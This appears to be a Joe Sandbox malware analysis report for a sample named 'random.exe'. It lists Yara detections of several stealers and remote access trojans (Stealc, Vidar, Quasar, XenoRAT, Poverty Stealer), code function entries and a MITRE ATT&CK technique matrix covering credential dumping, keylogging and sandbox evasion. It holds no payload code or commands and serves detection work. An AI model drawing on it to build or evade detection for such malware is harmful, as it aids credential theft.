Yara detected Poverty Stealer

Source: Yara match	File source: 48.0.0LGvvQO.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.2.0LGvvQO.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000030.00000000.2807373996.0000000000367000.00000002.00000001.01000000.00000026.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2935102839.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.2866371712.0000000000367000.00000002.00000001.01000000.00000026.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2806966885.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2806821084.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: skotes.exe PID: 8000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0LGvvQO.exe PID: 1712, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\0LGvvQO[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe, type: DROPPED

Yara detected Quasar RAT

Source: Yara match	File source: 28.2.28qbTrm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.28qbTrm.exe.4219970.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.28qbTrm.exe.4219970.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.2687425992.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2941190811.00000000036B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2767895284.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 28qbTrm.exe PID: 7712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 28qbTrm.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: services.exe PID: 7272, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000001.00000003.1862642790.0000000005040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2150281200.000000000115E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2148871243.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: K1T78D2510W1E77KV3WDUQ9M.exe PID: 3428, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: K1T78D2510W1E77KV3WDUQ9M.exe PID: 3428, type: MEMORYSTR

Yara detected XenoRAT

Source: Yara match	File source: 13.2.KQlljCB.exe.23e5364b060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KQlljCB.exe.23e5364b060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2766783072.0000023E5363D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KQlljCB.exe PID: 3180, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C590C40 sqlite3_bind_zeroblob,	1_2_6C590C40
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C590D60 sqlite3_bind_parameter_name,	1_2_6C590D60
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4B8EA0 sqlite3_clear_bindings,	1_2_6C4B8EA0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C590B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	1_2_6C590B40
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4B6410 bind,WSAGetLastError,	1_2_6C4B6410
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4BC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	1_2_6C4BC050
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4B6070 PR_Listen,	1_2_6C4B6070
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4BC030 sqlite3_bind_parameter_count,	1_2_6C4BC030
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4B60B0 listen,WSAGetLastError,	1_2_6C4B60B0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4422D0 sqlite3_bind_blob,	1_2_6C4422D0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4B63C0 PR_Bind,	1_2_6C4B63C0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4B9400 sqlite3_bind_int64,	1_2_6C4B9400
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4B94C0 sqlite3_bind_text,	1_2_6C4B94C0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4B94F0 sqlite3_bind_text16,	1_2_6C4B94F0
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Code function: 1_2_6C4B9480 sqlite3_bind_null,	1_2_6C4B9480

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Scheduled Task/Job	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	11 Input Capture	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	Logon Script (Windows)	1 Extra Window Memory Injection	1 Abuse Elevation Control Mechanism	Security Account Manager	348 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	112 Process Injection	31 Obfuscated Files or Information	NTDS	1061 Security Software Discovery	Distributed Component Object Model	11 Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Scheduled Task/Job	22 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	461 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	115 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Extra Window Memory Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	131 Masquerading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	461 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	112 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Files and Directories	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report random.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: XenoRAT

Threatname: Poverty Stealer

Threatname: Quasar

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
random.exe